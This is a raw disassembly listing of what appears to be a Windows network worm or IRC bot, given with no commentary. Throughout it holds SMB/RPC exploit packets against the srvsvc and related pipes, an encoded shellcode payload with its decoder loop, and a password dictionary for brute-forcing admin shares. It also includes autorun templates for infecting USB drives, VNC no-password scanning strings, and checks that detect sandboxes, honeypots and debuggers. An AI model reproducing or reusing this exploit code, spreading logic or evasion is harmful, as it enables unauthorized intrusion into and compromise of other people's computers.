aO db 'O$',0 ; DATA XREF: sub_4053EE+14C�o
align 10h
aN db 'N$',0 ; DATA XREF: sub_4053EE+142�o
align 4
asc_43E004 db 'L$',0 ; DATA XREF: sub_4053EE+12E�o
align 4
aK_0 db 'K$',0 ; DATA XREF: sub_4053EE+124�o
align 4
aJ db 'J$',0 ; DATA XREF: sub_4053EE+11A�o
align 10h
aI_1 db 'I$',0 ; DATA XREF: sub_4053EE+110�o
align 4
asc_43E014 db 'H$',0 ; DATA XREF: sub_4053EE+106�o
align 4
aG db 'G$',0 ; DATA XREF: sub_4053EE+FC�o
align 4
aF db 'F$',0 ; DATA XREF: sub_4053EE+F2�o
align 10h
aE_1 db 'E$',0 ; DATA XREF: sub_4053EE+E8�o
align 4
aD db 'D$',0 ; DATA XREF: sub_4053EE+DE�o
align 4
aC_0 db 'C$',0 ; DATA XREF: sub_4053EE+D4�o
align 4
aB db 'B$',0 ; DATA XREF: sub_4053EE+CA�o
align 10h
aNetlogon db 'NETLOGON$',0 ; DATA XREF: sub_4053EE+C0�o
align 4
aS_7 db 'S$',0 ; DATA XREF: sub_4053EE+B6�o
align 10h
aPrint db 'PRINT$',0 ; DATA XREF: sub_4053EE+AC�o
align 4
aIpc db 'IPC$',0 ; DATA XREF: sub_4053EE+A2�o
; sub_40978A+1A8�o
align 10h
aAdmin_2 db 'ADMIN$',0 ; DATA XREF: sub_4053EE+98�o
align 4
aCWindowsSystem db 'C:\WINDOWS\system32$',0 ; DATA XREF: sub_4053EE+89�o
align 10h
aAdministratorS db 'Administrator\\%s$',0 ; DATA XREF: sub_4053EE+6E�o
align 4
aSIpc db '%s\IPC$',0 ; DATA XREF: sub_405990+56�o
aS_0 db '\\%s',0 ; DATA XREF: sub_405990+15�o
; sub_40978A+150�o ...
align 8
dword_43E098 dd 0EFFFC481h, 44FFFFh, 43E148hdword_43E0A4 dd 42Ah dword_43E0A8 dd 3E8h dword_43E0AC dd 258h byte_43E0B0 db 0 ; DATA XREF: sub_405C6A+1E�r
; sub_405C6A+342�r ...
byte_43E0B1 db 1 ; DATA XREF: sub_405C6A:loc_405DDB�r
; sub_405C6A:loc_405FCA�r ...
align 4
dd offset aWinxp_0 ; "WinXP"
dd 2C6h, 264h, 0
dd 1
dword_43E0C8 dd 20804h ; sub_405C6A+448�o ...
dword_43E0CC dd 158h dword_43E0D0 dd 3000005h, 10h ; sub_4066B3+3B7�o
dword_43E0D8 dd 2 dup(0) ; sub_4066B3+38D�o
dword_43E0E0 dd 200h, 1F0000h, 2 dup(0) ; sub_4066B3+3A4�o
dword_43E0F0 dd 30B0005h, 10h, 48h, 0 dd 16D016D0h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_43E13C dd 158h ; sub_4066B3:loc_406A02�r
aWinxp_0 db 'WinXP',0 ; DATA XREF: .text:0043E0B4�o
align 4
aWinnt2k db 'WinNT+2K',0
align 4
loc_43E154: ; DATA XREF: sub_405C6A+36D�o
; sub_4066B3+487�o
jmp short near ptr dword_43E158
; ---------------------------------------------------------------------------
align 4
dword_43E158 dd 0 dword_43E15C dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 0 ; sub_40978A+293�o
dword_43E170 dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0aSPipeSrvsvc db '\\%s\pipe\srvsvc',0 ; DATA XREF: sub_405C6A+12A�o
; sub_405C6A+1DA�o
align 4
aSPipeTrkwks db '\\%s\pipe\trkwks',0 ; DATA XREF: sub_405C6A+8C�o
align 4
aSIpc_0 db '\\%s\IPC$',0 ; DATA XREF: sub_405C6A+47�o
; sub_405C6A+E5�o ...
align 4
dword_43E1B8 dd 2, 0 ; sub_4066B3+477�o
dword_43E1C0 dd 215h, 0 ; sub_4066B3+428�o
dword_43E1C8 dd 163h, 0 ; sub_4066B3+275�o
dword_43E1D0 dd 1, 0 ; sub_4066B3+3C2�o
aSPipeBrowser db '\\%s\PIPE\BROWSER',0 ; DATA XREF: sub_4066B3+AD�o
align 4
aSPipe db '\\%s\PIPE',0 ; DATA XREF: sub_4066B3+98�o
align 4
aSSSIFileS_ db '%s %s, %s: %i, File: %s.',0 ; DATA XREF: sub_406C3A+BF�o
align 4
aSSIpS db '%s (%s) -> IP: (%s)',0 ; DATA XREF: sub_406D50+1FB�o
; sub_406D50+22E�o ...
aSSSingleIpSSDO db '%s %s single Ip: (%s) %s: (%d) open.',0 ; DATA XREF: sub_406D50+DB�o
align 10h
aSSSSStartSD db '%s %s%s: (%s), Start%s: (%d)',0 ; DATA XREF: sub_407252+74�o
align 10h
aB_0 db '',0
dw 4400h
aCkfdenecfdef_2 db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aEkedfeeiedca_1 db ' EKEDFEEIEDCACACACACACACACACACAAA',0
align 10h
dword_43E2C0 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_407373+BE�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_1 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_1 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_43E350 dd 0B9000000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_407373+F7�o
dd 0C0750000h, 6DD70000h, 0FF0Ch, 2FFDF00h, 100h, 5B000000h
dd 0
db 0
db 5Ch, 0D0h, 0
db 80h ; €
db 7Eh, 0, 60h
db 59h ; Y
db 2 dup(6), 2Bh
db 6
db 1, 2 dup(5)
db 2
db 0A0h, 4Fh, 30h
db 4Dh ; M
db 0A0h, 0Eh, 30h
db 0Ch
db 6, 0Ah, 2Bh
db 6
db 1, 4, 1
db 82h ; ‚
db 37h, 2 dup(2)
db 0Ah
db 0A2h, 3Bh, 4
a9ntlmssp_0 db '9NTLMSSP',0
db 1, 2 dup(0)
db 0
db 1, 2, 8
db 0
db 9, 0, 9
db 0
db 20h, 2 dup(0)
db 0
db 10h, 0, 10h
db 0
db 29h, 2 dup(0)
db 0
aWorkgrouplqp_0 db 'WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195',0
aWindows20005_3 db 'Windows 2000 5.0',0
align 10h
dword_43E410 dd 0D010000h, 424D53FFh, 73h, 28011800h, 3 dup(0)
; DATA XREF: sub_407373+147�o
dd 0C0750000h
dword_43E430 dd 6DD72000h, 0FF0Ch, 2FFDF00h, 100h, 0AF000000h, 0
; DATA XREF: sub_407373+134�o
dd 0D05C00h, 0A100D280h, 8130AC81h, 0A681A2A9h, 4EA38104h
dd 534D4C54h, 3005053h, 18000000h, 40001800h, 18000000h
dd 58001800h, 12000000h, 70001200h, 0
dd 82000000h, 20000000h, 82002000h, 0
dd 0A2000000h, 1000000h, 0ED000802h, 778839B7h, 0BE16D7h
dd 3 dup(0)
db 0
db 2 dup(0), 42h
db 0AEh ; ®
db 0B7h, 1Fh, 0BBh
db 6Dh ; m
db 0C1h, 84h, 99h
db 1
aKXEcTijW_0 db 'k',8,'±xºeC',0Ah
db 'ÓšâI†)W',0
dd offset byte_52004F
dd offset byte_47004B
dd offset word_4F0052
dd offset byte_500055
dd offset dword_51006C
db 50h, 0, 78h
db 0
db 66h, 0, 32h
db 0
dd offset byte_530049
dd offset byte_670051
dd offset byte_560045
dd offset byte_620031
dd offset byte_4B0047
align 2
aWindows20002_1 db 'Windows 2000 2195',0
aWindows20005_4 db 'Windows 2000 5.0',0
align 8
dword_43E528 dd 6B000000h, 424D53FFh, 73h, 20011800h, 3 dup(0)
; DATA XREF: sub_407373+178�o
dd 0C0750000h, 6DD70000h, 0FF0Dh, 2FFDF00h, 100h, 2 dup(0)
dd 40000000h, 2E000000h, 4F570000h, 52474B52h, 50554Fh
aWindows20002_2 db 'Windows 2000 2195',0
aWindows20005_5 db 'Windows 2000 5.0',0
align 4
dword_43E598 dd 37000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_407373+1C5�o
dd 0C0750000h
dword_43E5B8 dd 6DD72001h, 0FF04h, 1000000h, 0C00h, 24435049h, 3F3F3F00h
; DATA XREF: sub_407373+1B5�o
dd 3F3Fh, 0
dword_43E5D8 dd 66000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_407373+22F�o
dword_43E5F4 dd 4780800h dword_43E5F8 dd 400800h, 0DE00FF18h, 1000DEh, 16h, 0 dd 2019Fh, 4 dup(0)
dd 1, 40h, 2, 1303h, 62005Ch, 6F0072h, 730077h, 720065h
dd 2 dup(0)
dword_43E648 dd 3F020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_407373+2AC�o
dword_43E664 dd 4780800h dword_43E668 dd 400800h, 0FF0Eh db 0
byte_43E671 db 0, 40h, 0 ; DATA XREF: sub_407373+299�o
dd 0FF000000h, 8FFFFFFh, 20000h, 3F020000h, 0
dd 5020000h, 10030B00h, 0
dd 2, 0D0000000h, 16D016h, 0B000000h, 0
dd 84000100h, 1FB33323h, 2C0E9508h, 0C32C304Ah, 1830708h
dd 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 1000000h, 0BE000100h, 54A71E0Eh, 91E02161h, 23E45A04h
dd 2D082E6h, 4000300h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 2000000h, 0E9000100h, 0E77F4FDFh, 0A54D6B2Bh
dd 833CAAD4h, 0A10315h, 4000200h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 3000000h, 0AD000100h, 19D89A50h
dd 1CF35CB9h, 0AD534199h, 175601Eh, 4000000h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 4000000h, 97000100h
dd 409F7E21h, 0D7BEC99Eh, 0F1B0A4EBh, 595FE37h, 4000300h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 5000000h
dd 0FD000100h, 858B52C8h, 8B3A74CCh, 30E02915h, 216ACCDh
dd 4000100h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 6000000h, 5B000100h, 0E19ACBDEh, 1F728325h, 92A2A310h
dd 7636E7h, 4000200h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h
dd 2604810h, 7000000h, 74000100h, 9C0CDF4h, 0BEF37F2Dh
dd 0C3573B8h, 1685206h, 4000000h, 0EB8A885Dh, 9F11C91Ch
dd 2B0008E8h, 2604810h, 8000000h, 0E5000100h, 0E1EA256Ch
dd 4AC21B8Ah, 29885617h, 106C3EEh, 4000200h, 0EB8A885Dh
dd 9F11C91Ch, 2B0008E8h, 2604810h, 9000000h, 26000100h
dd 4D7D7050h, 7BAF8288h, 0EA1D963Dh, 29A17EBh, 4000100h
dd 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h, 0A000000h
dd 0C8000100h, 704B324Fh, 1201D316h, 0BF475A78h, 388E16Eh
dd 4000000h, 0EB8A885Dh, 9F11C91Ch, 2B0008E8h, 2604810h
dd 2 dup(0)
dword_43E890 dd 3B000000h, 424D53FFh, 2Eh, 20011800h, 3 dup(0)
; DATA XREF: sub_407373+31D�o
dword_43E8AC dd 4780800h dword_43E8B0 dd 400800h, 0FF0Ah db 0
byte_43E8B9 db 0, 40h, 0 ; DATA XREF: sub_407373+30D�o
dd 80000000h, 0FFBB80BBh, 0FFFFFFh, 2 dup(0)
dword_43E8D0 dd 0FB020000h, 424D53FFh, 2Fh, 20011800h, 3 dup(0)
; DATA XREF: sub_407373+507�o
dword_43E8EC dd 4780800h dword_43E8F0 dd 400800h, 0FF0Eh db 0
byte_43E8F9 db 0, 40h, 0 ; DATA XREF: sub_407373+37E�o
dd 0FF000000h, 8FFFFFFh, 2BC00h, 3F02BC00h, 0
dd 502BC00h, 10030000h, 0BC000000h, 2, 0A4000000h, 0A000002h
dd 79001F00h, 3941FA0h, 0
dd 3000000h, 59000000h, 4C00h, 31000000h, 1, 31000000h
dd 5C000001h, 6E554600h, 76454C4Dh, 6A7A4E64h, 7A58746Eh
dd 6376416Eh, 7644534Fh, 556C5563h, 4A464C4Ch, 4350436Dh
dd 65676A6Dh, 44627058h, 74414943h, 5254446Ah, 79784150h
dd 58744958h, 78446643h, 58526A76h, 79535774h, 63714341h
dd 577A7250h, 55616548h, 6F72664Bh, 75456E68h, 555A7953h
dd 627A507Ah, 42A94365h, 15D53846h, 0A89B2567h, 3F9747B9h
dd 37B92B1h, 56696FCh, 91B68D04h, 0FD30B49Fh, 4A411D2Ch
dd 3448B3B0h, 4E4FF9B8h
db 0F5h
byte_43E9E1 db 31h, 0C9h, 83h ; DATA XREF: sub_407373+393�o
dd 0FFE8ADE9h, 0C0FFFFFFh, 0E76815Eh, 9794BB22h, 0E2FCEE83h
dd 0C07FA3F4h, 1544DD65h, 6B44D273h, 7FD1DE68h, 6B42CADAh
dd 1FDBDD68h, 1F9F06FBh, 0E8301ED2h, 7BBA5A92h, 1FA36D1Ch
dd 7FBA02C8h, 1F8FA9DEh, 548ACC96h, 543F8E0Eh, 5E7A25E3h
dd 7F79239Ah, 0B0EF1963h, 1F5E57BFh, 7FBA06C8h, 0DFB7A9F1h
dd 95A77D1Ch, 1F97217Ch, 889F4E1Eh, 4F8AE1F6h, 0A4F8A9F3h
dd 1FB7621Ch, 1F163EE7h, 0FCE52AD7h, 78B56C19h, 0F26DDDC7h
dd 0A7D344C4h, 0E7CC4AA5h, 6BEF7DA5h, 79704A47h, 6BEB196Bh
dd 71327D41h, 9C56A3F1h, 96D17795h, 4DD3F268h, 0C316D79Eh
dd 0C7E8F468h, 0D7E871C4h, 6BE861C4h, 85D34447h, 1DE844CBh
dd 30D3B776h, 0C37C528Dh, 84D1F468h, 444477C6h, 0BA1686FFh
dd 4244757Eh, 77C4h, 1Ah dup(0)
dd 6B000000h, 44447041h, 7475CDFFh, 424471F7h, 94BBF268h
dd 2E005C97h, 5C002E00h, 2E002E00h, 41005C00h, 48004F00h
dd 4D004C00h, 59005800h
db 0
byte_43EB61 db 0DEh, 0ADh, 0BEh ; DATA XREF: sub_407373+3A4�o
db 0EFh
byte_43EB65 db 0BAh, 0DEh, 0C0h ; DATA XREF: sub_407373+3A9�o
dd 544950DEh
db 48h
byte_43EB6D db 0FEh, 0EDh, 0FAh ; DATA XREF: sub_407373+3AE�o
dd 4A4649CEh, 54554F55h, 57555045h, 574D584Bh, 48475558h
dd 4B45494Dh, 4E455943h, 50514142h, 44455A4Ch, 424F4F4Eh
dd 0BA574D47h, 0D5853DB3h, 0EB4AF81Bh, 435A4D62h, 484C5754h
dd 495759h, 9A000000h, 2000001h, 0
dd 2000000h, 5C000000h, 1000000h, 10h, 2 dup(0)
dword_43EBD4 dd 1F1CB0h dword_43EBD8 dd 1F1CB0h dword_43EBDC dd 20408h, 1 dword_43EBE4 dd 1001361h dword_43EBE8 dd 1001361h dword_43EBEC dd 20408h, 2 dword_43EBF4 dd 6F88F727h dword_43EBF8 dd 6F8916E2h dword_43EBFC dd 20408h, 3 dword_43EC04 dd 6F88F807h dword_43EC08 dd 6F8917C2h dword_43EC0C dd 20408h, 4 dword_43EC14 dd 100129Eh dword_43EC18 dd 100129Eh dword_43EC1C dd 20408h, 5 dword_43EC24 dd 71BF21A2h dword_43EC28 dd 71BF21A2h dword_43EC2C dd 20408h, 6 dword_43EC34 dd 71BF3969h dword_43EC38 dd 71BF3969h dword_43EC3C dd 20408h, 7, 5860F727h, 586116E2h, 20408h, 8, 58FBF727h
; DATA XREF: sub_407373+4D7�o
dd 58FC16E2h, 20408h
dword_43EC60 dd 158h dword_43EC64 dd 7475615Ch, 6E75726Fh, 666E692Eh, 0aShellOpenDefau db 0Dh,0Ah ; DATA XREF: sub_40797B+406�o
db 'shell\open\default=1',0
align 10h
aIconSystemroot db 0Dh,0Ah ; DATA XREF: sub_40797B+3EE�o
db 'icon=%SystemRoot%\system32\SHELL32.dll,4',0Dh,0Ah
db 'action=Open folder to view files',0Dh,0Ah
db 'shell\open=Open',0Dh,0Ah
db 'shell\open\command=',0
align 4
aAutorunOpen db '[autorun]',0Dh,0Ah ; DATA XREF: sub_40797B+3D5�o
db 'open=',0
align 4
a_shellclassinf db '[.ShellClassInfo]',0Dh,0Ah ; DATA XREF: sub_40797B+2CD�o
db 'CLSID={645FF040-5081-101B-9F08-00AA002F954E}',0
aDesktop_ini db '\Desktop.ini',0 ; DATA XREF: sub_40797B+296�o
align 4
aSDDDDDDDDDDDDD db '\S-%d-%d-%d%d-%d%d%d%d%d%d%d%d%d%d-%d%d%d%d%d%d%d%d%d%d-%d%d%d%d%'
; DATA XREF: sub_40797B+246�o
db 'd%d%d%d%d-%d%d%d%d',0
aRecycler db '\RECYCLER',0 ; DATA XREF: sub_40797B+74�o
align 4
aSInfectedUsbDr db '%s Infected USB drive: %s',0 ; DATA XREF: sub_407E1C+77�o
align 8
off_43EDE8 dd offset byte_454A34 ; DATA XREF: .text:00409616�r
; .text:00409622�o
dd offset a123 ; "123"
dd offset a1234 ; "1234"
dd offset aLetmein ; "letmein"
dd offset aAdmin_1 ; "admin"
dd offset aAdministrator ; "Administrator"
dd offset a1234567 ; "1234567"
dd offset aPassword ; "password"
dd offset a12345 ; "12345"
dd offset a123456 ; "123456"
dd offset aArsenal ; "arsenal"
dd offset aMonkey ; "monkey"
dd offset aCharlie ; "charlie"
dd offset off_43D970
dd offset aPass_1 ; "pass"
dd offset aMaster ; "master"
dd offset aQwerty ; "qwerty"
dd offset a12345678 ; "12345678"
dd offset a654321 ; "654321"
dd offset aAbc123 ; "abc123"
dd offset aThomas ; "thomas"
align 10h
dd 66B5217h
aNxSystemrootSy db '#NX',7,'%systemroot%\system32\cmd.exe',0
align 4
aExit db 'exit',0
align 10h
word_43EE70 dw 1 ; DATA XREF: sub_407FFA+24�r
; .text:00408183�r
align 4
word_43EE74 dw 4 ; DATA XREF: sub_407FFA+10�r
align 4
dword_43EE78 dd 64257325h, 64256425h, 652E6425h, 6578hdword_43EE88 dd 6325h, 0 ; .text:00408AAE�o ...
aSSSSDSSSSSSS_0 db '%s %s %s %s %d >> %s %s %s %s %s >> %s %s %s >> %s %s %s %s >> %s'
; DATA XREF: .text:0040875D�o
; .text:00408A86�o ...
db ' %s %s >> %s %s%s %s %s %s',0Dh,0Ah,0
align 10h
aSSSSDSSSSSSSSS db '%s %s %s %s %d >> %s %s %s %s %s >> %s %s %s %s >> %s %s %s >> %s'
; DATA XREF: .text:004086CC�o
; .text:004089E4�o ...
db ' %s%s %s %s %s',0Dh,0Ah,0
align 4
aS_5 db '%s',0 ; DATA XREF: .text:00408555�o
; sub_408B6A+2C9�o ...
align 4
aVncD_DSNopass db 'VNC%d.%d: %s - (NoPass)',0 ; DATA XREF: .text:0040852A�o
; sub_408B6A+29E�o
aRfb03d_03d db 'RFB %03d.%03d',0Ah,0 ; DATA XREF: .text:0040838C�o
; .text:004083BA�o ...
align 10h
word_43EF70 dw 72h ; DATA XREF: .text:004081AD�r
; sub_408B6A+25�r ...
align 4
word_43EF74 dw 63h ; DATA XREF: .text:004081A0�r
; sub_408B6A+3E�r ...
align 4
loc_43EF78: ; DATA XREF: .text:0040818A�o
; sub_408B6A+2E�o
jmp ebx
; ---------------------------------------------------------------------------
align 4
dword_43EF7C dd 0DFFh ; sub_408B6A+1A�o
dword_43EF80 dd 0EBFFh ; sub_408B6A+E�o
dword_43EF84 dd 201h dword_43EF88 dd 20424652h, 2E333030h, 0A383030h, 0aVncD_DSS db 'VNC%d.%d: %s - %s',0 ; DATA XREF: sub_408B6A+797�o
align 10h
dword_43EFB0 dd 158h dword_43EFB4 dd 0D0EC8166h, 7dword_43EFBC dd 129F74h, 0 dword_43EFC4 dd 127D78h, 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43EFD0 proc near ; DATA XREF: sub_40978A+D1�o
; FUNCTION CHUNK AT 0043EFD6 SIZE 00000043 BYTES
pusha
jmp short loc_43EFD6
sub_43EFD0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43EFD3 proc near ; CODE XREF: sub_43EFD0:loc_43EFD6�p
pop ebx
push ebx
retn
sub_43EFD3 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EFD0
loc_43EFD6: ; CODE XREF: sub_43EFD0+1�j
call sub_43EFD3
xor eax, eax
add al, 34h
add eax, ebx
push eax
pop ebx
loc_43EFE3: ; CODE XREF: sub_43EFD0+3C�j
xor edx, edx
add dl, [eax]
inc eax
add dh, [eax]
inc eax
push eax
xor eax, eax
add al, 41h
sub dl, al
sub dh, al
shl dl, 4
shr dx, 4
xor eax, eax
xor dh, dh
add al, [ebx]
sub [ebx], al
add [ebx], dx
inc ebx
pop eax
xor ecx, ecx
add cl, [eax]
loopne loc_43EFE3
popa
loc_43F00F: ; DATA XREF: sub_40978A+B0�r
add [ebx+31h], al
loc_43F012: ; DATA XREF: sub_40978A+AA�r
mov ebp, 7FC77h
loc_43F017: ; DATA XREF: sub_40978A:loc_409A79�r
; sub_40978A+319�r ...
add [ecx], al
; END OF FUNCTION CHUNK FOR sub_43EFD0
; ---------------------------------------------------------------------------
db 3 dup(0)
db 43h
; ---------------------------------------------------------------------------
loc_43F01D: ; CODE XREF: .text:0043F01F�j
xor eax, eax
ja short loc_43F01D
pop es
; ---------------------------------------------------------------------------
dw 0
dd 1, 77BB1F89h, 7FCh, 1, 77C01F89h, 7FCh, 1, 655B4F02h
dd 7E7h
dword_43F048 dd 0 ; ---------------------------------------------------------------------------
sub [ecx+77h], ecx
sub ecx, [ecx-1Eh]
ja short near ptr byte_43F0A1
retf
; ---------------------------------------------------------------------------
dw 77E3h
dd 7518A747h, 77BD3143h
dword_43F060 dd 158h dword_43F064 dd 6BFFD098h, 3610A112h, 0C3463398h, 5A347EF8h, 0
; DATA XREF: sub_40978A+255�o
dword_43F078 dd 65706970h, 736B775Ch, 637673haNetvalidatenam db 'NetValidateName',0 ; DATA XREF: sub_409EB3+15�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409EB3+A�o
; sub_41729C:loc_417DA9�o
byte_43F0A1 db 3 dup(0) ; CODE XREF: .text:0043F053�j
dword_43F0A4 dd 4000500h, 7868746Bh, 0dword_43F0B0 dd 54207325h, 20505446h, 25203E2Dh, 73h ; .text:0040A4AD�o
dword_43F0C0 dd 736E495Ch, 54656469h, 5C6DhaImail8_001531N db '(IMail 8.00 153-1) NT-ESMTP Server X1',0 ; DATA XREF: sub_40A633+64�o
align 4
aNepenthes db 'nepenthes',0 ; DATA XREF: sub_40A633+5D�o
align 10h
aCurrentuser db 'currentuser',0 ; DATA XREF: sub_40A633+56�o
aVmware db 'vmware',0 ; DATA XREF: sub_40A633+4F�o
align 4
aHoneymule db 'HoneyMule',0 ; DATA XREF: sub_40A633+48�o
align 10h
aHoneyd db 'honeyd',0 ; DATA XREF: sub_40A633+41�o
align 4
aHoneyc db 'honeyc',0 ; DATA XREF: sub_40A633+3A�o
align 10h
aHoney db 'honey',0 ; DATA XREF: sub_40A633+33�o
align 4
aSnort db 'snort',0 ; DATA XREF: sub_40A633+2C�o
align 10h
aSandbox db 'Sandbox',0 ; DATA XREF: sub_40A633+25�o
aRoo db 'roo',0 ; DATA XREF: sub_40A633+1E�o
aTu4nh09smcg1hc db 'TU-4NH09SMCG1HC',0 ; DATA XREF: sub_40A633+15�o
aShowtray db 'ShowTray',0 ; DATA XREF: sub_40A708+E8�o
align 4
aInstallpath db 'InstallPath',0 ; DATA XREF: sub_40A708+CE�o
aSoftwareVmware db 'SOFTWARE\VMware, Inc.\VMware Tools',0 ; DATA XREF: sub_40A708+C9�o
align 4
aDaemon db 'DAEMON',0 ; DATA XREF: sub_40A708:loc_40A77E�o
align 10h
aIsdebuggerpres db 'IsDebuggerPresent',0 ; DATA XREF: sub_40A708:loc_40A741�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_40A708+1E�o
align 4
aDJstMfgyq_ db 'd/Jst/MFgyQ.',0 ; DATA XREF: sub_40A938+F41�o
; sub_4155B9+159�o
align 4
aErwc30qfw_p0 db 'eRWc30Qfw.P0',0 ; DATA XREF: sub_40A938+1084�o
; sub_40A938+4611�o ...
align 4
a86tb1fspjg0 db '86tb/1FSpjg0',0 ; DATA XREF: sub_40A938+CA6�o
; sub_4155B9+172�o
align 4
aPlsymAee6v1 db 'PlsYM/aEe6v1',0 ; DATA XREF: sub_40A938+4D0�o
; sub_4155B9+17D�o
align 4
aDehziSaO0 db 'deHZI/SA//o0',0 ; DATA XREF: sub_40A938+22�o
; sub_40A938:loc_40AD49�o ...
align 4
aOb4iqKj5ue_ db 'Ob4iQ/KJ5ue.',0 ; DATA XREF: sub_40A938+5E�o
; sub_40A938+C70�o ...
align 4
aNfknl0nqigy0 db 'NFKNL0nQigY0',0 ; DATA XREF: sub_40A938+E67�o
; sub_4155B9+19E�o
align 4
aE0idd0rdw2u db 'e0idD0RDw2U/',0 ; DATA XREF: sub_40A938+C8B�o
; sub_4155B9+1A9�o
align 4
aEuior0ay2w7__0 db 'EUIOR0ay2w7.',0 ; DATA XREF: sub_40A938+33�o
; sub_40A938+88C�o ...
align 4
aPdazx1odsoh0 db 'PDazX1oDSOh0',0 ; DATA XREF: sub_40A938+A07�o
; sub_4155B9+1BF�o
align 4
aUc6wg1ovwvt1 db 'uc6Wg1OvWVt1',0 ; DATA XREF: sub_40A938+44�o
; sub_40A938:loc_40B35A�o ...
align 4
aDj9owUmrbd_ db 'dJ9OW/uMRBD.',0 ; DATA XREF: sub_40A938+46D�o
; sub_4155B9+1D8�o
align 4
aP00ls0k4t_n1 db 'P00Ls0K4t.N1',0 ; DATA XREF: sub_40A938+630�o
; sub_4155B9+1E3�o
align 4
aL3nyw_d7tfl_ db 'l3nYW.D7Tfl.',0 ; DATA XREF: sub_40A938+562�o
; sub_4155B9+1EE�o
align 4
aQc9zs1zgzff0 db 'Qc9zS1zGZff0',0 ; DATA XREF: sub_40A938+2816�o
; sub_4155B9+1F9�o
align 4
aWpuwr_6yfru db 'WpuWr.6YFRU/',0 ; DATA XREF: sub_40A938+2844�o
; sub_4155B9+204�o
align 4
a4rmbzFcic21 db '4RmBz/FCic21',0 ; DATA XREF: sub_40A938+2948�o
; sub_4155B9+20F�o
align 4
aSc_coSwlk_ db 'SC.Co/swLK/.',0 ; DATA XREF: sub_40A938+296B�o
; sub_4155B9+21A�o
align 4
aSud8hRsu8j1 db 'sUd8h/rsu8j1',0 ; DATA XREF: sub_40A938+270�o
; sub_40A938+4705�o ...
align 4
aJ2yyw_j09xc db 'j2yYw.J09XC/',0 ; DATA XREF: sub_40A938+281�o
; sub_40A938+47F2�o ...
align 4
a43ucs0rkqux_ db '43uCS0rkQUx.',0 ; DATA XREF: sub_40A938+4974�o
; sub_4155B9+386�o
align 4
aJc8j0_blhir0 db 'jC8j0.blHIr0',0 ; DATA XREF: sub_40A938+498D�o
; sub_4155B9+394�o
align 4
aPiygc_bgpyh_ db 'PIYGC.BgPyH.',0 ; DATA XREF: sub_40A938+4A17�o
; sub_4155B9+39F�o
align 4
a7bqzu_aqz2u_ db '7bQzU.aQz2u.',0 ; DATA XREF: sub_40A938+4BDB�o
; sub_4155B9+3AA�o
align 4
aSar5v0jloic0 db 'saR5v0JloIc0',0 ; DATA XREF: sub_40A938+4C1F�o
; sub_4155B9+3B5�o
align 4
aX43mxEgedu_ db 'x43Mx/eGeDu.',0 ; DATA XREF: sub_40A938+4C9C�o
; sub_4155B9+3C0�o
align 4
aIsopf_pu4ty0 db 'IsoPF.PU4tY0',0 ; DATA XREF: sub_40A938+4D19�o
; sub_4155B9+3CB�o
align 4
a98mu_Nedn7_ db '98mu./nEdn7.',0 ; DATA XREF: sub_40A938+4E89�o
; sub_4155B9+3D6�o
align 4
aVdirq_mjcpx1 db 'vDIrQ.MJcpx1',0 ; DATA XREF: sub_40A938+5021�o
; sub_4155B9+3E1�o
align 4
aSad25HpR91 db 'Sad25/hP/R91',0 ; DATA XREF: sub_40A938+50CC�o
; sub_4155B9+3EF�o
align 4
aVsz2xXqjp5 db 'Vsz2x/xqJP5/',0 ; DATA XREF: sub_40A938+B5E�o
; sub_4155B9+3FA�o
align 4
aPnb_aBfzu60_0 db 'pNb.a/Bfzu60',0 ; DATA XREF: sub_40A938+1AA5�o
; sub_4155B9+405�o
align 4
aI7atf_8Tag1 db 'i7Atf.8/tag1',0 ; DATA XREF: sub_40A938+1B74�o
; sub_4155B9+410�o
align 4
aDo5oa0u5m7_ db 'dO5oA/0U5m7.',0 ; DATA XREF: sub_40A938+18B5�o
; sub_4155B9+41B�o
align 4
aS3dyJzo6r_0 db 's3dY//JZo6r/',0 ; DATA XREF: sub_40A938+18A4�o
; sub_4155B9+426�o
align 4
aKe3l20ufrlq0 db 'kE3L20Ufrlq0',0 ; DATA XREF: sub_40A938+18C6�o
; sub_4155B9+431�o
align 4
aVp1weJvqbn_ db 'VP1WE/JVQbn.',0 ; DATA XREF: sub_40A938+FB�o
; sub_40A938+1C13�o ...
align 4
aUaxwg1w8vsp0qr db 'UaxWg1w8vSP0QRn4z10ge1I1',0 ; DATA XREF: sub_40A938+1CF2�o
; sub_4155B9+44A�o
align 10h
